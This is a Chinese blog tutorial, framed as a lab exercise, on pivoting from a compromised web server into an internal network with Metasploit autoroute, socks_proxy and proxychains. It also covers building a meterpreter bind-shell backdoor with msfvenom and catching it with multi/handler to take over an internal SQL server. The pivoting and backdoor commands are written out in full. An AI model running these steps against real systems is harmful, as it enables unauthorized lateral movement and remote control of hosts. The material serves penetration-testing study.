kali环境下msf+proxychains构造代理通讯链实现不出网主机通讯

前言

欢迎来到我的博客

个人主页:北岭敲键盘的荒漠猫-优快云博客

本文整理在linux系统下,利用msf配合代理转发工具proxychains实现访问不出网主机

实验环境与构架

本次实验目的利用代理通讯链让kali攻击服务器能直接访问管理员win7系统。

实现原理:

利用一个主机多个网卡的特性,即沦陷一台主机就能利用这台主机访问本不应在外网可访问到的主机,这个就是我们访问内网不可达主机的原理。

实验开始

初期外网渗透结束位置

内网主机群体防火墙关闭

我们跳过外网web渗透直接从上线web服务器开始操作。

现在这个小内网我们当前攻击进度如下:

接下来我们的目的就是能够让我们kali中的工具能直接访问sql服务器,进行下面部分的攻击。

配置代理通讯sql服务器

现在我们知道了我们拥有了web服务器的权限。

现在我们就需要查看这个服务器的路由,看看web服务器有哪几个网卡。

能够访问哪几个网段。

run autoroute -p
第一次使用未开启模块需要输入下面这个

run post/multi/manage/autoroute

现在我们得知,当前文件有128和152两个网段的网卡。

再执行一遍,可查看

run autoroute -p

现在需要我们在对方主机上开启socket协议

用来转发流量,或者去正向上线木马。

首先我们要暂时退出控制session的命令行。

然后使用auxiliary/server/socks_proxy模块

background

use auxiliary/server/socks_proxy

使用模块后可以用

show options

来查看可配置的选项

我们可以选择使用socket5或者4a版本,以及开放协议的端口号。

如果是5的话可以配置账号密码。

这里随便设置一个8848端口。

然后run即可。

现在就会在web机器上开启socket协议。

现在我们要配置proxychains

(kali中自带了这个东西,但是如果是其他的linux的服务器,需要自己下载)

他有一个配置文件(操作有点像改hosts文件)

在etc目录下有这个文件

打开后最底下

像添加hosts规则一样把协议,ip跟端口写在这里。

我的环境中我们需要添加的是

socks5  127.0.0.1 8848

然后我们使用代理的命令只要前面加一个proxychains4即可。

现在我们直接尝试nmap扫描sql服务器192.168.152.131即可

这里直接nmap无法扫描,原因是nmap会用到一些ping等协议,这些底层的socket做不了,所以出问题。

现在我们就能通讯sql服务器了。

正向拿下sql服务器权限

现在假设我们拿下sql权限。

生成正向后门。

msfvenom -p windows/meterpreter/bind_tcp LPORT=8849 -f exe -o sql.exe

正向后门是我们找对方,所以需要先运行木马,在进行监听

现在对方点击了木马

设置监听

use exploit/multi/handler

set payload windows/meterpreter/bind_tcp
set rhost [目标ip]
set lport [己方端口]
run

返回界面之后可以用

sessions和jobs分别查看session和代理的设置

之后感染内网的其他计算机就是上面的相同规则。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

北岭敲键盘的荒漠猫

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值